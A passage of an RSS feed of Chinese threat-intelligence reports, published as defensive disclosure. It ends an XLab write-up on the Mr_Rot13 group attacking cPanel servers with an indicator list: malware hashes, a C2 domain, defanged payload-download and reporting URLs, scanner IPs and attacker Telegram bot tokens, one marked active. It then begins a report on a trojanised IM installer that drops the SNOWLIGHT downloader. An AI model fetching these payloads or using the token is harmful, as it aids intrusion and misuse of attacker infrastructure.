8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">实际产生的流量如上所示，我们持续跟踪了数日，但遗憾的是，始终未从 C2 收到有效响应，因此无法解密样本中经 RC4 加密的载荷，难以进一步分析该 PHP 后门的具体功能。不过可以确定的是，WordPress 无疑是 Mr_Rot13 的重点攻击目标之一。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.525" data-type="jpeg" data-w="800" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100035024" src="https://wechat2rss.xlab.app/img-proxy/?k=210c1ae0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOqibNvnLRNUxcsibtU3oOlGnodKPfwEpNShh0ISVxibm1GYg2mbMVGK0q36oY7RT81ntmeqgCicWX6gycm8aGeKOHUCQ5Csic7gCicEuc%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">总结</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这是目前掌握的 Mr_rot13 黑客团伙的所有情报，受限于分析视野，相关信息仍不完整，欢迎掌握更多线索的团队或个人与我们共享情报；如果您对我们的研究感兴趣，或者了解内幕消息，欢迎通过 X 平台（@Xlab_qax）与我们联系。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">IOC</span></h2><h3><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">MD5</span></span></h3><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="markdown"><code><span leaf="">2286f126ab4740ccf2595ad1fa0c615c <span class="code-snippet__emphasis">*help.php</span></span></code><br/><code><span leaf="">2de27ca8d97124adaf604b18161a441e *Update</span></code><br/><code><span leaf="">29222f5e73dd10088fcf1204aa21f87f <span class="code-snippet__emphasis">*Update</span></span></code><br/><code><span leaf="">fb1bc3f935fdeb3555465070ba2db33c *Update</span></code><br/><code><span leaf="">45fc93426cf08f91c9f9de5f04a12263 <span class="code-snippet__emphasis">*filemanager-darwin-amd64</span></span></code><br/><code><span leaf="">711afb014f64c97d7b31685709c34ce7 *filemanager-darwin-arm64</span></code><br/><code><span leaf="">22613c952459e65ce09fb6b5c1c03d47 <span class="code-snippet__emphasis">*filemanager-linux-386</span></span></code><br/><code><span leaf="">9305b4ebbb4d39907cf36b62989a6af3 *filemanager-linux-amd64</span></code><br/><code><span leaf="">e49f68a363c867608972680799389daf <span class="code-snippet__emphasis">*filemanager-linux-arm64</span></span></code><br/><code><span leaf="">e1ec6ebb96cf87c785ee6a7da677c059 *filemanager-linux-armv7</span></code><br/><code><span leaf="">02a5990b11293236e01f174f5999df20 <span class="code-snippet__emphasis">*filemanager-windows-386.exe_</span></span></code><br/><code><span leaf="">bae1f1bce7c82fa86f05b12e2e254cfc *filemanager-windows-amd64.exe<span class="code-snippet__emphasis">_</span></span></code><br/></pre></p><h3><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-weight: bold;">C2</span></span></h3><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="css"><code><span leaf="">wrned<span class="code-snippet__selector-attr">[.]</span>com</span></code></pre></p><h3><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-weight: bold;">Downloader URL</span></span></h3><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="bash"><code><span leaf=""><a href="https://cp.dene[.]de.com/cpanel.py" target="_blank">https://cp.dene[.]de.com/cpanel.py</a></span></code><br/><code><span leaf=""><a href="https://cp.dene[.]de.com/login.js" target="_blank">https://cp.dene[.]de.com/login.js</a></span></code><br/><code><span leaf=""><a href="https://cp.dene[.]de.com/adminer.php" target="_blank">https://cp.dene[.]de.com/adminer.php</a></span></code><br/><code><span leaf=""><a href="https://cp.dene[.]de.com/Update" target="_blank">https://cp.dene[.]de.com/Update</a></span></code><br/><code><span leaf=""><a href="https://wpsock[.]com/cpanel/install.sh" target="_blank">https://wpsock[.]com/cpanel/install.sh</a></span></code><br/><code><span leaf=""><a href="https://wpsock[.]com/cpanel/dist/filemanager-linux-386" target="_blank">https://wpsock[.]com/cpanel/dist/filemanager-linux-386</a></span></code><br/><code><span leaf=""><a href="https://wpsock[.]com/cpanel/dist/filemanager-linux-amd64" target="_blank">https://wpsock[.]com/cpanel/dist/filemanager-linux-amd64</a></span></code><br/><code><span leaf=""><a href="https://wpsock[.]com/cpanel/dist/filemanager-linux-armv7" target="_blank">https://wpsock[.]com/cpanel/dist/filemanager-linux-armv7</a></span></code><br/><code><span leaf=""><a href="https://wpsock[.]com/cpanel/dist/filemanager-linux-arm64" target="_blank">https://wpsock[.]com/cpanel/dist/filemanager-linux-arm64</a></span></code><br/><code><span leaf=""><a href="https://wpsock[.]com/cpanel/dist/filemanager-windows-386.exe" target="_blank">https://wpsock[.]com/cpanel/dist/filemanager-windows-386.exe</a></span></code><br/><code><span leaf=""><a href="https://wpsock[.]com/cpanel/dist/filemanager-windows-amd64.exe" target="_blank">https://wpsock[.]com/cpanel/dist/filemanager-windows-amd64.exe</a></span></code><br/><code><span leaf=""><a href="https://wpsock[.]com/cpanel/dist/filemanager-darwin-arm64" target="_blank">https://wpsock[.]com/cpanel/dist/filemanager-darwin-arm64</a></span></code><br/><code><span leaf=""><a href="https://wpsock[.]com/cpanel/dist/filemanager-darwin-amd64" target="_blank">https://wpsock[.]com/cpanel/dist/filemanager-darwin-amd64</a></span></code><br/></pre></p><h3><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-weight: bold;">Reporter URL</span></span></h3><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="bash"><code><span leaf=""><a href="https://cp.dene[.]de.com/collect.php" target="_blank">https://cp.dene[.]de.com/collect.php</a></span></code><br/><code><span leaf=""><a href="https://wrned[.]com/log.php" target="_blank">https://wrned[.]com/log.php</a></span></code><br/></pre></p><h3><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-weight: bold;">Scanner IP</span></span></h3><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="apache"><code><span leaf=""><span class="code-snippet__attribute">178</span>.<span class="code-snippet__number">249</span>.<span class="code-snippet__number">209</span>.<span class="code-snippet__number">182</span></span></code><br/><code><span leaf=""><span class="code-snippet__attribute">149</span>.<span class="code-snippet__number">102</span>.<span class="code-snippet__number">229</span>.<span class="code-snippet__number">146</span></span></code><br/></pre></p><h3><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-weight: bold;">Telegram Token &amp; Channel &amp; USER ID</span></span></h3><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="makefile"><code><span leaf="">Token</span></code><br/><code><span leaf=""><span class="code-snippet__section">1190043163:AAEy1FDoB_r8KFiOIqsEpgDQ2k78Ai6BdWk (Revoked)</span></span></code><br/><code><span leaf=""><span class="code-snippet__section">1190043163:AAFtaUfpui9fqKoRnqOa5XvT6MHLcK1axiU (Active)</span></span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf="">Group</span></code><br/><code><span leaf="">-443071772</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf="">BOT ID: 1190043163</span></code><br/><code><span leaf="">0xWR ID: 1209569354</span></code><br/></pre></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://blog.xlab.qianxin.com/mr_rot13-the-elusive-6-year-hacker-group-weaponizing-critical-cpanel-flaws-for-backdoor-deployment_cn/">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=8e2c3247&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2MDc2MDA4OA%3D%3D%26mid%3D2247518785%26idx%3D1%26sn%3D8777ef11aef31d8aa6472fc48d7a53c2">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 13 May 2026 10:01:00 +0800</pubDate>
    </item>
    <item>
      <title>【原创】某加密IM官网供应链事件，“离岸”爱国者卷土重来</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247518784&amp;idx=1&amp;sn=16b5fe101414c690ae21f811f931791d</link>
      <description>奇安信威胁情报中心红雨滴团队私有情报生产流程发现一家面向中文用户提供私密IM的软件官网上的安装包被替换。被替换的安装包除了正常流程外，还会释放如下组件，内存加载SNOWLIGHT下载者，最终运行魔改nps隧道。</description>
      <content:encoded><![CDATA[<p>原创 <span>威胁情报中心</span> <span>2026-05-12 09:37</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=66c239c3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOqiceM5c6Ip4DoR47Pwv8RQ8jHY9uiajDibAo1yCSQrkPdMgQ3JMBUw1LWCSbA2EMEP0BVSSrDjPKiauJe4lGh7MqnddfqmHumeZJib4%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>奇安信威胁情报中心红雨滴团队私有情报生产流程发现一家面向中文用户提供私密IM的软件官网上的安装包被替换。被替换的安装包除了正常流程外，还会释放如下组件，内存加载SNOWLIGHT下载者，最终运行魔改nps隧道。</p>
  <div style="font-size: 15px;letter-spacing: 1px;line-height: 1.75;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: left;margin: 10px 0%;display: flex;flex-flow: row;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="font-size: 20px;color: rgb(55, 113, 187);padding: 0px 3px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">概述</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2em;word-break: break-all;margin: 0px 0px 8px;padding: 0px;box-sizing: border-box;"><span leaf="">奇安信威胁情报中心红雨滴团队私有情报生产流程发现一家面向中文用户提供私密IM的软件官网上的安装包被替换，下载信息如下：</span></p><table style="overflow-wrap:break-word;color:rgb(43, 48, 59);font-family:-apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size:16px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-transform:none;widows:2;word-spacing:0px;-webkit-text-stroke-width:0px;white-space:normal;text-decoration-thickness:initial;text-decoration-style:initial;text-decoration-color:initial;min-width:199px;"><tbody><tr style="overflow-wrap: break-word;"><th data-colwidth="174" align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">字段名称 (Field)</span></span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">详细信息 (Details)</span></span></p></th></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="174" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><b style="overflow-wrap: break-word;"><span leaf=""><span textstyle="" style="font-size: 15px;">Referrer</span></span></b></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">hxxps:// www.sXXXit.com/(官方网站)</span></span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-size: 15px;"><a href="https://www.sXXXXchat.com/" target="_blank">https://www.sXXXXchat.com/</a> (官方网站)</span></span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="174" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><b style="overflow-wrap: break-word;"><span leaf=""><span textstyle="" style="font-size: 15px;">Download URL</span></span></b></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;"><a href="https://XXXXsu.oss-cn-beijing.aliyuncs.com/XX_pc.exe" target="_blank">https://XXXXsu.oss-cn-beijing.aliyuncs.com/XX_pc.exe</a> (官方URL路径)</span></span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="174" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><b style="overflow-wrap: break-word;"><span leaf=""><span textstyle="" style="font-size: 15px;">Malware</span></span></b><b style="overflow-wrap: break-word;"><span leaf=""><span textstyle="" style="font-size: 15px;"> MD5</span></span></b></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">df3bd55c46adbf13ae68b5a9b1da19a0</span></span></p></td></tr></tbody></table></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">被替换的安装包除了正常流程外，还会释放如下组件，内存加载SNOWLIGHT下载者，最终运行魔改nps隧道。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.20351758793969849" data-s="300,640" data-type="png" data-w="796" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100035115" src="https://wechat2rss.xlab.app/img-proxy/?k=b02ef2d1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FodcL3w4qOq8P9AuSWs9Mj8UWiaXxWnkJ05w8AYj1hPwbFDD3lzdkW3V3TicSu1gBKmrazQic4v1AMSm3VHLWdZ51SibvkVTddIbYOicLPHPE80GU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">天擎高级威胁引擎可以对落地木马进行拦截：</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.675146771037182" data-s="300,640" data-type="png" data-w="511" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100035117" src="https://wechat2rss.xlab.app/img-proxy/?k=643efee3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FodcL3w4qOqibJNibibSBPtNSpEnFzyjFFTaibP6NDotLQtzxAr8rkJ2tFBkVgurl9M9lZ6G68QzDrQfcv8ibtBOL17Uv5OBx0873r018UVekzHO8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: left;margin: 10px 0%;display: flex;flex-flow: row;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="font-size: 20px;color: rgb(55, 113, 187);padding: 0px 3px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">SNOWLIGHT分析以及事件披露</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px 0px 8px;padding: 0px;box-sizing: border-box;"><span leaf="">SNOWLIGHT最早由Mandiant于2024年初披露</span><sup style="font-size: 11px;box-sizing: border-box;"><span leaf="">[1]</span></sup><span leaf="">，归属于UNC5174。奇安信威胁情报中心则是在2024年底CSDN事件</span><sup style="font-size: 11px;box-sizing: border-box;"><span leaf="">[2]</span></sup><span leaf="">的后续组件中观察到了SNOWLIGHT内存加载Vshell的情况，但并没有对外公开。直到2025年发布《Operation(润)RUN》</span><sup style="font-size: 11px;box-sizing: border-box;"><span leaf="">[3]</span></sup><span leaf="">对UNC5174进行了明确的定性。</span></p><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">SNOWLIGHT支持linux和windows双平台，协议上支持http、https、websocket</span><span style="text-indent: 2.1333em;box-sizing: border-box;"><span leaf="">、QUIC等协议。</span></span></p></div><div style="text-align: center;justify-content: center;margin: 30px 0% 10px;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;border-bottom: 17px solid rgb(240, 244, 255);border-bottom-right-radius: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0% -8px;box-sizing: border-box;"><div style="letter-spacing: 0px;line-height: 1;font-size: 16px;color: rgb(49, 94, 163);padding: 0px 5px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Win平台事件</span></strong></p></div></div></div></div><div style="font-size: 16px;color: rgb(49, 94, 163);box-sizing: border-box;"><p style="margin: 8px 0px 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">内网渗透</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 8px 0px 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Win平台下的活动分为两类，一类通过sqlserver爆破和主流web组件漏洞入侵边界windows服务器，通过执行</span><span leaf="">bitsadmin</span><span leaf="">或者curl下载并执行BAT类型的SNOWLIGHT：</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6135734072022161" data-s="300,640" data-type="png" data-w="722" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100035114" src="https://wechat2rss.xlab.app/img-proxy/?k=bfd899a3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FodcL3w4qOq8sxCngkqtic0mWErgyuhLB5ibaTPv9RkPBaibcuHScdVyWnz9cibGQK2OH3OzBicqYuGvC8s5geE19rtib4jdicQcicicibD0kayibzoF7IE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">BAT脚本下载golang或C++版本的SNOWLIGHT:</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.14074074074074075" data-s="300,640" data-type="png" data-w="1080" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100035116" src="https://wechat2rss.xlab.app/img-proxy/?k=8cc48b59&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FodcL3w4qOq81y9dWTTdhyHoPAzHkSDDuNC2DK95LqLccC4UPCdKS0S0iahtX38FGGlXwLnIhBUiaJxibf22bf72fPkiaqrib6VqXIth6ZbMjehzA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">C++编译的SNOWLIGHT如下:</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.47270306258322237" data-s="300,640" data-type="png" data-w="751" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100035113" src="https://wechat2rss.xlab.app/img-proxy/?k=02c54a60&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FodcL3w4qOq9Jq0ho1AcLSASUhib1zQV1Zmw3burw6ia5RERnFzUEicCWmnz71SS1Q0hBsCdlvOXwyGARBicUVmB3WZ5JMgDv4qA1Wiaj99gqibZNE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px 0px 8px;padding: 0px;box-sizing: border-box;"><span leaf="">不同的渗透阶段SNOWLIGHT加载的payload有所不同，在《Operation(润)RUN》</span><sup style="font-size: 11px;box-sizing: border-box;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 15px;letter-spacing: 1px;line-height: 1.75;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;color: rgb(62, 62, 62);&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-align: left;box-sizing: border-box;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-indent: 2.1333em;word-break: break-all;margin: 0px 0px 8px;padding: 0px;box-sizing: 